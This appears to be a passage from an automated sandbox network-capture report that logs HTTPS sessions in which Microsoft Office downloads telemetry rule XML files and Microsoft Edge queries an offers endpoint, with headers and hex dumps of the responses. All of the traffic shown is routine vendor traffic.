                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                        ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                        Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                        Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                        X-CID: 11
                                                                                                                                                                                                                                                        X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                        X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=233724
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:26 GMT
                                                                                                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        X-CID: 2
                                                                                                                                                                                                                                                        2024-11-20 23:49:26 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                        Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        13192.168.2.54974113.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:28 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                        x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234928Z-1777c6cb754xjpthhC1TEBexs80000000a0g000000010hy3
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        14192.168.2.54974513.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:28 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 467
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                        x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234928Z-178bfbc474bw8bwphC1NYC38b400000000mg000000001ese
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        15192.168.2.54974413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:28 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 632
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                        x-ms-request-id: 70a275ef-201e-0051-048c-3a7340000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234928Z-1777c6cb7544n7p6hC1TEByvb40000000agg000000002upq
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        16192.168.2.54974313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:28 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                        x-ms-request-id: 7a9720a2-e01e-0020-0a18-3bde90000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234928Z-r1d97b99577n4dznhC1TEBc1qw00000009ng0000000088zy
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        17192.168.2.54974213.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:28 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:28 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 471
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                        x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234928Z-1777c6cb754lvj6mhC1TEBke940000000abg00000000f5my
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:29 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        18192.168.2.54974713.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:30 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:31 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                        x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234931Z-178bfbc474b7cbwqhC1NYC8z4n00000000fg00000000fzv5
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        19192.168.2.54975094.245.104.564437728C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:31 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                        Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                        2024-11-20 23:49:31 UTC725INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:31 GMT
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        Set-Cookie: ARRAffinity=669e5d63f834ba1a072bdb5fc0556584be42d71c1d6957cb98615f4df78b3341;Path=/;HttpOnly;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                        Set-Cookie: ARRAffinity=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                        Set-Cookie: ARRAffinitySameSite=8b656f4ecf6270dbe9097aac1834960f61903fdb6f6ce3be7cbc242f17e7233a;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                        Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        20192.168.2.54976313.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:31 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:32 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                        x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234932Z-1777c6cb7549x5qchC1TEBggbg0000000adg000000006af0
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                        21192.168.2.54976413.107.246.45443
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:32 GMT
                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                        Content-Length: 486
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                        ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                        x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                        x-azure-ref: 20241120T234932Z-1777c6cb7544n7p6hC1TEByvb40000000ag0000000005dyg
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2024-11-20 23:49:32 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


